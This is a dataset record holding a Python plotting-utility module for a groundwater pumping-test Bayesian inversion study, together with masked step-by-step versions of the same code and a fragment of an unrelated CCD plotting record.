fig.suptitle(suptitle + '; mean of segments, per CCD', y=0.94, size=20)\n plt.savefig(out_dir + title + '_CCD.png')\n plt.close(fig)\n\ndef plot_voltage_raft(x, data, imgs, title, out_dir, suptitle=''):\n if suptitle == '':\n suptitle = title\n fig = plt.figure(figsize=(7, 7))\n y = []\n for i in range(len(x)):\n y.append(np.mean(data[i]))\n plt.plot(x, y)\n\n fig.suptitle(suptitle + '; mean of all segments', y=0.96, size=20)\n plt.savefig(out_dir + title + '_raft.png')\n plt.close(fig)\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Author: Lijing Wang ([email protected]), 2021
import numpy as np
import pandas as pd
import gstools as gs
import matplotlib.pyplot as plt
from matplotlib import patches
import seaborn as sns
plt.rcParams.update({'font.size': 15})
import os
path = os.path.dirname(os.getcwd())
subpath = '/examples/case2_nonlinear_forward_pumping_test/'
num_prior_sample = 5000
num_x = 100
num_y = 100
def print_theta(theta, name = 'theta'):
theta_pd = pd.DataFrame(theta.reshape(1,-1), index = [name], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])
print(theta_pd)
def visualize_d_2D(d):
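    # NOTE: num_m (total cell count, presumably num_x*num_y) and G (the block-to-cell
    # mapping matrix) are not defined in this module; they are assumed to come from
    # the surrounding workflow.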
num_block = 3
d_vis = np.zeros(num_m)
d_vis[:] = np.nan
for i in range(num_block*num_block*2):
d_vis[np.where(G[i,:]>0)[0]] = d[i]
d_vis = d_vis.reshape(num_x,num_y)
return d_vis
def visualize_one_d(d):
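    # d holds 70 head values at the pumping well, sampled every 0.1 day (x-axis in days)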
plt.plot(np.arange(70)/10, d.reshape(70,1)[:,0],label = 'pumping well')
plt.xlabel('Days')
plt.ylabel('Head')
plt.legend()
def visualize_one_m(m, vmin = -4, vmax = 0, cmap = 'viridis',title = 'True spatial field, m'):
fig, ax = plt.subplots(figsize = [6,6])
m_show = ax.imshow(m.T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
ax.set_xticks([])
ax.set_yticks([])
if title:
ax.set_title(title,fontsize = 13)
well_location = [49,49]
direct_data_loc = [30,70]
ax.scatter(well_location[0],well_location[1],s = 100, color = 'black', label = 'indirect pumping well')
ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 100, color = 'red', label = 'direct logK')
ax.legend()
fig.colorbar(m_show, ax = ax, shrink = 0.6)
def print_theta_multiple(theta, name = 'theta',head = 8):
theta_pd = pd.DataFrame(theta, index = ['theta_'+str(i) for i in np.arange(1,theta.shape[0]+1)], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])
print(theta_pd.head(head))
def visualize_multiple_m(m, head = 4, vmin = -4, vmax = 0, cmap = 'viridis', theta = None):
plt.figure(figsize = [20,8])
for i in np.arange(head):
ax = plt.subplot(1, 4, i+1)
ax.imshow(m[i,:,:].T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
ax.set_xticks([])
ax.set_yticks([])
well_location = [49,49]
direct_data_loc = [30,70]
ax.scatter(well_location[0],well_location[1],s = 50, color = 'black', label = 'pumping well')
ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')
if theta is not None:
ax.set_title('\u03B8 = '+str(tuple(np.round(theta[i,:],1))))
def visualize_multiple_pc(m, PCA, head = 8, vmin = -4, vmax = 0, cmap = 'viridis',rect = False):
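    # m holds flattened principal-component maps (one row per component); PCA is
    # expected to be dict-like with an 'explained_variance' entry giving the
    # variance fraction of each component.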
plt.figure(figsize = [25,10])
for i in np.arange(head):
ax = plt.subplot(1, 10, i+1)
ax.imshow(m[i,:].reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
if rect:
rect = patches.Rectangle((32,32),36, 36, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
        ax.set_title('PCA '+str(i+1)+': '+str(int(PCA['explained_variance'][i]*100))+'%')
def visualize_multiple_d(d, head = 4):
plt.figure(figsize = [25,3])
for i in np.arange(head):
ax = plt.subplot(1, 4, i+1)
ax.plot(np.arange(70)/10, d[:,i].reshape(70,1)[:,0],label = 'pumping well')
#ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,1],label = 'obs well: SW')
#ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,2],label = 'obs well: NE')
##ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,3],label = 'obs well: NW')
#ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,4],label = 'obs well: SE')
ax.set_xlabel('Days')
ax.set_ylabel('Head')
#ax.legend()
def colors_from_values(values, palette_name):
# normalize the values to range [0, 1]
normalized = (values - min(values)) / (max(values) - min(values))
# convert to indices
indices = np.round(normalized * (len(values) - 1)).astype(np.int32)
# use the indices to get the colors
palette = sns.color_palette(palette_name, len(values))
return np.array(palette).take(indices, axis=0)
def visualize_mean_var(mu, covariance, vmin = 20, vmax = 40, cmap = 'viridis'):
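    # NOTE: start_loc_x, start_loc_y and num_grid (pilot-area position and size)
    # are not defined in this module; they are assumed to be set elsewhere.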
var = np.diag(covariance)
plt.figure(figsize = [18,4])
ax = plt.subplot(2, 4, 1)
ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
ax = plt.subplot(2, 4, 2)
ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = 0, vmax = 16)
rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
def visualize_mean_var_MC(m, start_loc, num_grid,vmin = -3, vmax = 1,vmin_var = 0, vmax_var = 0.2, cmap = 'viridis', rect = False):
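    # m is an ensemble of flattened fields (realizations x cells); the mean and
    # variance maps below are computed across realizations.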
mu = np.mean(m,axis = 0)
var = np.var(m,axis = 0)
plt.figure(figsize = [10,4])
ax = plt.subplot(1, 2, 1)
ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
if rect:
rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
well_location = [49,49]
ax.scatter(well_location[0],well_location[1],s = 20, color = 'black', label = 'pumping well')
direct_data_loc = [30,70]
ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')
ax = plt.subplot(1, 2, 2)
ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = 'magma', vmin = vmin_var, vmax = vmax_var)
if rect:
rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
def visualize_ensemble_d(d,d_obs,ymin = None,ymax = 11.5):
plt.plot(np.arange(70)/10, d,color = 'C0')
plt.plot(np.arange(70)/10, d_obs,color = 'C1',linewidth = 2,label = 'observed data')
plt.xlabel('Days')
plt.ylabel('Head')
plt.legend()
plt.ylim(ymin,ymax)
# Visualization: updating theta
def pos_pairplot(theta_pos, theta_name):
sns.pairplot(pd.DataFrame(theta_pos.T,columns = theta_name),kind="hist")
def prior_pos_theta(theta, theta_pos, theta_true, theta_name):
num_theta = theta.shape[1]
plt.figure(figsize=[25,10])
for i in np.arange(num_theta):
ax = plt.subplot(2, 3, i+1)
ax.hist(theta[:,i],density=True, bins = 1,label = 'prior',alpha = 0.7)
y_, _, _ = ax.hist(theta_pos[i,:],density=True, bins = 20,label = 'posterior',alpha = 0.7)
ax.vlines(x = theta_true[i], ymin = 0, ymax = np.max(y_),linestyles='--',label = 'true',color = 'black')
ax.legend()
ax.set_title(theta_name[i])
ax.set_ylabel('pdf')
def ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test, S_d_obs, theta_name):
fig = plt.figure(figsize=[24,10])
num_theta = len(theta_name)
for i in np.arange(num_theta):
ax = plt.subplot(2, 3, i+1)
ax.plot(pred_train[:,i], y_train[:,i],'.',label = 'train')
ax.plot(pred_test[:,i], y_test[:,i],'.',label = 'test')
ax.vlines(x = S_d_obs[0,i],ymin = -1, ymax = 1, linestyles='--',color = 'black',zorder = 100)
ax.plot([-1.2,1.2],[-1.2,1.2])
ax.legend()
ax.set_xlabel('S(d_'+str(i+1)+')')
ax.set_ylabel(theta_name[i]+'_rescaled')
ax.set_xlim(-1.2,1.2)
ax.set_ylim(-1.2,1.2)
def history_plot(history):
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
|
normal
|
{
"blob_id": "09fb99a15c2727da2ef96028aca5513337449f62",
"index": 3772,
"step-1": "<mask token>\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\n<mask token>\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\n<mask token>\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\n<mask token>\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\n<mask token>\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n 
plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-2": "<mask token>\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block * num_block * 2):\n d_vis[np.where(G[i, :] > 0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x, num_y)\n return d_vis\n\n\n<mask token>\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\n<mask token>\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\n<mask token>\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n 
ax.set_yticks([])\n\n\ndef visualize_mean_var_MC(m, start_loc, num_grid, vmin=-3, vmax=1, vmin_var\n =0, vmax_var=0.2, cmap='viridis', rect=False):\n mu = np.mean(m, axis=0)\n var = np.var(m, axis=0)\n plt.figure(figsize=[10, 4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n ax.scatter(well_location[0], well_location[1], s=20, color='black',\n label='pumping well')\n direct_data_loc = [30, 70]\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color='red',\n label='direct logK')\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap='magma',\n vmin=vmin_var, vmax=vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-3": "<mask token>\nplt.rcParams.update({'font.size': 15})\n<mask token>\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block * num_block * 2):\n d_vis[np.where(G[i, :] > 0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x, num_y)\n return d_vis\n\n\ndef visualize_one_d(d):\n plt.plot(np.arange(70) / 10, d.reshape(70, 1)[:, 0], label='pumping well')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\ndef print_theta_multiple(theta, name='theta', head=8):\n theta_pd = pd.DataFrame(theta, index=[('theta_' + str(i)) for i in np.\n arange(1, theta.shape[0] + 1)], columns=['mean', 'variance',\n 'max_range', 'min_range', 'anisotropy', 'head_west'])\n print(theta_pd.head(head))\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\ndef visualize_multiple_pc(m, PCA, head=8, vmin=-4, vmax=0, cmap='viridis',\n rect=False):\n plt.figure(figsize=[25, 10])\n for i in np.arange(head):\n ax = plt.subplot(1, 10, i + 1)\n ax.imshow(m[i, :].reshape(num_x, num_y).T, origin='lower', cmap=\n cmap, vmin=vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((32, 32), 36, 36, linewidth=2,\n linestyle='dashed', edgecolor='black', facecolor='None')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('PCA ' + str(i + 1) + ': ' + str(np.int(PCA[\n 'explained_variance'][i] * 100)) + '%')\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, 
origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_mean_var_MC(m, start_loc, num_grid, vmin=-3, vmax=1, vmin_var\n =0, vmax_var=0.2, cmap='viridis', rect=False):\n mu = np.mean(m, axis=0)\n var = np.var(m, axis=0)\n plt.figure(figsize=[10, 4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n ax.scatter(well_location[0], well_location[1], s=20, color='black',\n label='pumping well')\n direct_data_loc = [30, 70]\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color='red',\n label='direct logK')\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap='magma',\n vmin=vmin_var, vmax=vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in 